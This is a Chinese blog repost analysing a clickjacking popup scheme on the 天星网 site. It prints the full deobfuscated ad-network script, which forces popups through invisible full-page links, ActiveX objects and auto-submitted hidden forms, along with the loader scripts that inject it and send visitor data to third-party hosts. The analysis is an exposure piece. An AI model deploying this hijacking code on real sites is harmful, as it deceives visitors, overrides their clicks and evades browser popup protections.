精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

天星网ClickJacking点击劫持分析

2015-01-20 11:42 来源: 编辑:admin
刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。   http://www.lxting.com/script/popup/v1_min.js   这个是锁定到底JS脚本, 解密后的代码  
(function() { 
    var aa_url = window.ytpp_url; 
    var ua = navigator.userAgent; 
    var form_div = document.createElement('div'); 
    var form_pd = 0; 
    var browser = { 
        ie: /msie/i.test(ua), 
        ie6: /msie 6/i.test(ua), 
        ie7: /msie 7/i.test(ua), 
        ie8: /msie 8/i.test(ua), 
        ie9: /msie 9/i.test(ua), 
        360 : /360se/i.test(ua), 
        sogou: /;?se.+?MetaSr/i.test(ua), 
        maxthon: /Maxthon/i.test(ua), 
        tt: /TencentTraveler/i.test(ua), 
        ff: /firefox/i.test(ua), 
        webkit: /AppleWebKit/i.test(ua), 
        opera: /Opera/i.test(ua), 
        qqbrowser: /QQBrowser/i.test(ua), 
        cr: /chrome/i.test(ua), 
        gg: window.chrome, 
        theworld: /Theworld/i.test(ua) 
    }; 
    var _setting = ""; 
    var _ct = 0; 
    var _le = 0; 
    var _pd = 1; 
    var _pd2 = 0; 
    var _pc = 1; 
    var _pc2 = 1; 
    var _pco = 0; 
    var _pta = 0; 
    var _ptb = 0; 
    var _pt2a = 0; 
    var _pt2b = 0; 
    var _pt3a = 0; 
    var _pt3b = 0; 
    var _pt4a = 0; 
    var _pt4b = 0; 
    var _pt5a = 0; 
    var _pt5b = 0; 
    var _pt6a = 0; 
    var _pt6b = 0; 
    var _pt7a = 0; 
    var _pt7b = 0; 
    var _pt8a = 0; 
    var _pt8b = 0; 
    var _pt9a = 0; 
    var _pt9b = 0; 
    var _pt10a = 0; 
    var _pt10b = 0; 
    var _po = 0; 
    var _poo = 0; 
    var ckn, ckt; 
    var ads = 0; 
    function b(w) { 
        var s = w + "="; 
        var r = ""; 
        var o = 0; 
        var d = 0; 
        var p = document.cookie; 
        if (document.cookie.length > 0) { 
            o = document.cookie.indexOf(s); 
            if (o != -1) { 
                o += s.length; 
                d = document.cookie.indexOf(";", o); 
                if (d == -1) d = document.cookie.length; 
                r = unescape(document.cookie.substring(o, d)) 
            } 
        } 
        return r 
    }; 
    function p(w, p, v) { 
        var t = 30; 
        try { 
            t = parseFloat(p) * 1 
        } catch(e) { 
            t = 30 
        } 
        if (isNaN(t)) t = 30; 
        var then = new Date(); 
        then.setTime(then.getTime() + t * 60 * 1000); 
        document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
    }; 
    function init() { 
        _setting = ytpp_sti; 
        if (getp(_setting, "CT")) { 
            _ct = getp(_setting, "CT") 
        } 
        if (getp(_setting, "LE")) { 
            _le = getp(_setting, "LE") 
        } 
        if (getp(_setting, "PD2")) { 
            _pd2 = getp(_setting, "PD2") 
        } 
        if (getp(_setting, "PC2")) { 
            _pc2 = getp(_setting, "PC2") 
        } 
        if (getp(_setting, "PCO")) { 
            _pco = getp(_setting, "PCO") 
        } 
        for (var i = 1; i <= 10; i++) { 
            var n = i == 1 ? "": i; 
            if (getp(_setting, "PT" + n)) { 
                eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); 
                eval("_pt" + n + "a = _pt" + n + "[0];"); 
                eval("_pt" + n + "b = _pt" + n + "[1];") 
            } 
        } 
        if (getp(_setting, "PO")) { 
            _po = getp(_setting, "PO") 
        } 
        if (getp(_setting, "POO")) { 
            _poo = getp(_setting, "POO") 
        } 
        if (_pco == 1 || _poo == 1) { 
            if (_poo == 1) { 
                _pco = 0 
            } else { 
                _poo = 0 
            } 
            _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; 
            for (var i = 2; i <= 10; i++) { 
                eval("_pt" + i + "a = _pt" + i + "b = 0;") 
            } 
        } 
    }; 
    function getp(s, p) { 
        var i = s.indexOf(p + ":"); 
        if (i >= 0) { 
            return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) 
        } 
    }; 
    function event(e, event, func, act) { 
        if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); 
        else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) 
    } 
    function pop(url, param) { 
        if (!document.body) { 
            return setTimeout(function() { 
                pop(url, param) 
            }, 
            13) 
        } 
        try { 
            if (browser['cr'] && browser['gg']) { 
                try { 
                    hrefopen(url) 
                } catch(e) { 
                    a_pop(url) 
                } 
            } else if (browser['webkit'] && browser['maxthon']) { 
                if (!func(url)) { 
                    try { 
                        form_pop(url); 
                        a_pop(url) 
                    } catch(e) {} 
                } 
            } else if (browser['tt']) { 
                try { 
                    object_pop(url) 
                } catch(e) { 
                    a_pop(url) 
                } 
            } else if (browser['sogou']) { 
                if (!func(url)) { 
                    try { 
                        a_pop(url) 
                    } catch(e) {} 
                } 
            } else if (browser['webkit'] && browser['qqbrowser']) { 
                if (!func(url)) { 
                    try { 
                        form_pop(url) 
                    } catch(e) { 
                        click_pop(url) 
                    } 
                } 
            } else if (browser['webkit'] || browser['opera']) { 
                try { 
                    form_pop(url); 
                    a_pop(url) 
                } catch(e) {} 
            } else if (browser['theworld'] && browser.ie6) { 
                if (!object_pop2(url)) { 
                    a_pop(url) 
                } 
            } else if (browser['theworld'] && browser.ie8) { 
                if (!func(url)) { 
                    try { 
                        object_pop(url) 
                    } catch(e) { 
                        click_pop(url) 
                    } 
                } 
            } else if (browser.ie6) { 
                if (!func(url)) { 
                    object_pop2(url) 
                } 
            } else if (browser.ie8) { 
                if (!func(url)) { 
                    try { 
                        object_pop(url) 
                    } catch(e) { 
                        document.onclick = function() { 
                            func(url); 
                            document.onclick = null 
                        } 
                    } 
                } 
            } else if (browser['ie']) { 
                try { 
                    object_pop(url) 
                } catch(e) { 
                    click_pop(url) 
                } 
            } else if (browser['ff']) { 
                if (!func(url)) { 
                    click_pop(url) 
                } 
            } else { 
                if (!func(url)) { 
                    click_pop(url) 
                } 
            } 
        } catch(e) { 
            if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { 
                click_pop(url) 
            } else { 
                a_pop(url) 
            } 
        } 
    } 
    function object_pop(url, param) { 
        var object = document.createElement('object'); 
        object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); 
        object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 
        append(object); 
        object.launchURL(url); 
        ads++; 
        p(ckn, ckt, ads) 
    } 
    function object_pop2(url, param) { 
        var object2 = document.createElement('object'); 
        object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A'); 
        object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 
        append(object2); 
        for (var i in object2) { 
            try { (function(o) {})(object2[i]) 
            } catch(e) {} 
        } 
        setTimeout(function() { 
            object2.DOM.Script.open(url, '_blank', '') 
        }, 
        500); 
        ads++; 
        p(ckn, ckt, ads) 
    } 
    function append(e) { 
        for (var t in { 
            body: 1 
        }) { 
            var ele = document.getElementsByTagName(t); 
            for (var i = 0; i < ele.length; i++) { 
                ele[i].insertBefore(e, ele[i].firstChild); 
                return
            } 
        } 
    } 
    function hrefopen(url) { 
        try { 
            var c = document.createElement("a"); 
            c.setAttribute("href", url); 
            c.setAttribute("target", "_blank"); 
            c.setAttribute("style", "display:none;"); 
            var b = document.createEvent("MouseEvents"); 
            b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null); 
            c.dispatchEvent(b); 
            ads++; 
            p(ckn, ckt, ads); 
            return true 
        } catch(q) { 
            return false 
        } 
    } 
    function form_pop(url) { 
        form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 
        form_div.setAttribute('style', 'display:none'); 
        var form = document.createElement('form'); 
        form.setAttribute('action', aa_url); 
        form.setAttribute('method', 'post'); 
        form.setAttribute('name', '__unionsky_push_d_form_box__'); 
        form.setAttribute('target', '_blank'); 
        form.setAttribute('style', 'display:none'); 
        var sinput = document.createElement('input'); 
        sinput.setAttribute('style', 'display:none'); 
        sinput.setAttribute('type', 'submit'); 
        sinput.setAttribute('id', '_sumit_2app'); 
        form.appendChild(sinput); 
        form_div.appendChild(form); 
        append(form_div); 
        var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; 
        try { 
            document.getElementById("_sumit_2app").click() 
        } catch(e) { 
            event(document, 'keyup', 
            function(e) { 
                if (document.getElementById('__unionsky_push_d_object_box__') == null) { 
                    return
                }; 
                e = e || window.event; 
                e.canceBubble = true; 
                event(document, 'keyup', arguments.callee, true); 
                form_pd = 1; 
                unionsky_from.submit() 
            }) 
        } 
    }; 
    function click_pop(url, param) { 
        event(document, 'mouseup', 
        function(e) { 
            e = e || window.event; 
            e.canceBubble = true; 
            event(document, 'mouseup', arguments.callee, true); 
            func(url, param); 
            ads++; 
            p(ckn, ckt, ads) 
        }) 
    }; 
    function a_pop(url) { 
        if (ytpp_plid == 166028) { 
            return
        } 
        if (!document.body) { 
            return setTimeout(function() { 
                a_pop(url) 
            }, 
            13) 
        } 
        var a = document.createElement("a"); 
        a.href = url; 
        a.target = "_blank"; 
        var div = document.createElement('div'); 
        div.style.backgroundColor = '#fff'; 
        a.appendChild(div); 
        append(a); 
        var as = a.style; 
        as.position = "absolute"; 
        as.zIndex = '2147483647'; 
        as.display = "block"; 
        as.top = "0px"; 
        as.left = "0px"; 
        as.cursor = 'default'; 
        as.opacity = "0"; 
        as.filter = "alpha(opacity:0)"; 
        var m = setInterval(function() { 
            if (form_pd == 1) { 
                a.parentNode.removeChild(a); 
                clearInterval(m); 
                return
            } 
            a.style.zIndex = '2147483647'; 
            var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body; 
            a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; 
            div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px'; 
            div.style.height = d.clientHeight + 'px'; 
            if (browser['ie']) { 
                try { 
                    var divs = document.body.childNodes; 
                    for (var i = 0; i < divs.length; i++) { 
                        if (!divs[i]['style']) { 
                            continue
                        } 
                        var _i = parseInt(divs[i].style.zIndex); 
                        if (_i && divs[i] != a && _i == 2147483647) { 
                            divs[i].style.zIndex = _i - 1 
                        } 
                    } 
                    a.style.zIndex = '2147483647'
                } catch(e) {} 
            } 
        }, 
        120); 
        a.onclick = function(e) { 
            if (document.getElementById('__unionsky_push_d_object_box__') != null) { 
                form_div.parentNode.removeChild(form_div) 
            } 
            e = e || window.event; 
            e.cancelBubble = true; 
            setTimeout(function() { 
                a.parentNode.removeChild(a) 
            }, 
            200); 
            clearInterval(m); 
            ads++; 
            p(ckn, ckt, ads) 
        }; 
        event(a, 'mouseup', 
        function(e) { 
            e = e || window.event; 
            e.cancelBubble = true 
        }) 
    } 
    function func(url, param) { 
        var f = window[String.fromCharCode(111, 112, 101, 110)]; 
        var w = f(url, '_blank', 'left=0,top=0,toolbar=yes,location=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes,width=' + screen.width + ',height=' + screen.height); 
        if (w) { 
            ads++; 
            p(ckn, ckt, ads) 
        }; 
        return w 
    } 
    function fstart(url) { 
        init(); 
        if (_ct >= 0) { 
            ckn = "YITIAN_NUM"; 
            ckt = _ct 
        } else { 
            ckn = "YITIAN_ALL"; 
            ckt = Math.abs(_ct) 
        } 
        if (ckt > 0) { 
            if (b(ckn)) { 
                try { 
                    ads = parseFloat(b(ckn)) 
                } catch(q) {} 
            } 
        } 
        if ((ads > 0 && ckn == 'YITIAN_ALL') || ads >= ytpp_ads) { 
            return
        } else { 
            if (_le > 0) { 
                setTimeout(go(url), _le * 1000) 
            } else { 
                go(url) 
            } 
        } 
    } 
    function go(url) { 
        if (_poo == 1) { 
            try { 
                func(url) 
            } catch(q) {} 
        } else if (_pco == 1) { 
            a_pop(url) 
        } else { 
            if (_pd == 1) { 
                setTimeout(function() { 
                    pop(url, { 
                        a: 1, 
                        b: 2 
                    }) 
                }, 
                300) 
            } 
            if (_pd2 > Math.random()) { 
                setTimeout(function() { 
                    pop(url, { 
                        a: 1, 
                        b: 2 
                    }) 
                }, 
                300) 
            } 
            for (var i = 1; i <= 10; i++) { 
                var n = i == 1 ? "": i; 
                if (eval("_pt" + n + "b") > Math.random()) { 
                    setTimeout(function() { 
                        setTimeout(function() { 
                            pop(url, { 
                                a: 1, 
                                b: 2 
                            }) 
                        }, 
                        300) 
                    }, 
                    parseInt(eval("_pt" + n + "a")) * 1000) 
                } 
            } 
            if (_pc2 > Math.random()) { 
                a_pop(url) 
            } 
            if (_po > Math.random()) { 
                try { 
                    func(url) 
                } catch(q) {} 
            } 
        } 
    }; 
    fstart(aa_url); 
    event(window, 'beforeunload', 
    function() {}) 
})();


    通过浏览器抓包 URL从这里产生   http://play.unionsky.cn/show/?placeid=141830   直接打开看不到什么东西 http://www.unionsky.cn/ 是属于这个广告联盟的 我们直接分析抓包的内容  
var ytpp_r = encodeURIComponent(encodeURIComponent(document.referrer)); 
ytpp_r = ytpp_r.length > 1000 ? ytpp_r.substring(0, 1000) : ytpp_r; 
var ytpp_u = encodeURIComponent(navigator.userAgent); 
var ytpp_s = window.screen.width + "*" + window.screen.height; 
var ytpp_l = navigator.browserLanguage || navigator.language; 
var ytpp_plid = 141830; 
var ytpp_w = 0; 
var ytpp_h = 0; 
var ytpp_url = "http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random(); 
var ytpp_ads = 14; 
var ytpp_sti = 'CT:-3;PD:1;PC:1;PC2:1;PT:60,1;PT2:100,1;'; 
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/pp/?p=f7xNjUO8Y81LybptxG2Vq//rYbtxQcP5GVnJOL07Ka8=&r=" + ytpp_r + "&u=" + ytpp_u + "&s=" + ytpp_s + "&l=" + ytpp_l + "&n=" + Math.random() + "'></script>"); 
document.write("<script language='javascript' type='text/javascript' src='http://www.lxting.com/script/popup/v1_min.js'></script>");

 

  那么这个http://play.unionsky.cn/show/?placeid=141830又是从哪里被引用进去呢。 继续分析 发现这里   http://txsite.21tx.com/count/count.js      
txcount_uid = 1; 
txcount_uh = 0; 
txcount_uw = 0; 
txcount_uah = 0; 
txcount_uaw = 0; 
txcount_ucd = 0; 
  
if (window.screen) { 
  txcount_uh = window.screen.height; 
  txcount_uw = window.screen.width; 
  txcount_uah = window.screen.availHeight; 
  txcount_uaw = window.screen.availWidth; 
  txcount_ucd = window.screen.colorDepth; 
} 
  
  
var url = "http://txsite.21tx.com/count/count.aspx"; 
url = url + "?u="+ txcount_uid; 
//url = url + "&f=" + txcount_f; 
url = url + "&k=" + txsite_pagekey; 
//url = url + "&t=" + txcount_t; 
url = url + "&l=" + escape(document.location); 
url = url + "&r=" + escape(document.referrer); 
url = url + "&uh=" + txcount_uh; 
url = url + "&uw=" + txcount_uw; 
url = url + "&uah=" + txcount_uah; 
url = url + "&uaw=" + txcount_uaw; 
url = url + "&ucd=" + txcount_ucd; 
  
  
document.write("<script src=" + url + "><\/script>"); 
//document.write('<script src="http://s4.cnzz.com/stat.php?id=4820460&web_id=4820460" language="JavaScript" charset="gb2312"><\/script>'); 
  
document.write('<script src="http://s127.cnzz.com/stat.php?id=1474936&web_id=1474936" language="JavaScript" charset="gb2312"><\/script>'); 
  
  
document.write("<script language='javascript' src='http://play.unionsky.cn/show/?placeid=141830'><\/script>");

 

  一切昭然天下了。 代码产生的直接效果如下    <a href="http://www.lxting.com/jmp/?p=f7xNjUO8Y80tB6KZyJ*jzRXjLuoZaOluHDv/IndJK1Z/mc0eKhM2QddlbEorugPwTAd08JIi*oDNYfaUSsF7QNBk3/CB3LW8&amp;r=&amp;u=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F27.0.1453.116%20Safari%2F537.36&amp;s=1920*1080&amp;l=zh-CN&amp;n=0.27341766096651554" target="_blank" style="position: absolute; z-index: 2147483647; display: block; top: 0px; left: 0px; cursor: default; opacity: 0;"><div style="background-color: rgb(255, 255, 255); width: 1903px; height: 650px;"></div></a>    很隐秘的一段好代码  
标签
你喜欢的文章
返回首页
扫描微信
返回顶部